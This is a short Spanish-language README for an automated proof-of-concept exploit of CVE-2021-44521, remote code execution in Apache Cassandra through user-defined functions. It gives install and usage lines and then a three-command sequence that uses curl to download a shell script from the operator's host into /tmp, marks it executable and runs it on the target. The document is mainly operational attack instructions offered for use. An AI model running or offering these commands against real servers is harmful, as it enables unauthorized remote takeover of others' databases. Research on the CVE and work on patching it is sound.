
Exploit automatizado de prueba de concepto para CVE-2021-44521, que permite la ejecución remota de código en Apache Cassandra mediante funciones definidas por el usuario. Ejecuta comandos arbitrarios en la IP objetivo.
PoC automatizado de CVE-2021-44521 Créditos al PoC original: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Cassandra-driver
pip3 install cassandra-driver
python3 poc.py <ip> <cmd>
Ten en cuenta que no puedes ejecutar más de un comando a la vez, ni usar tuberías (pipes) por ahora. Así que ejecuta
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"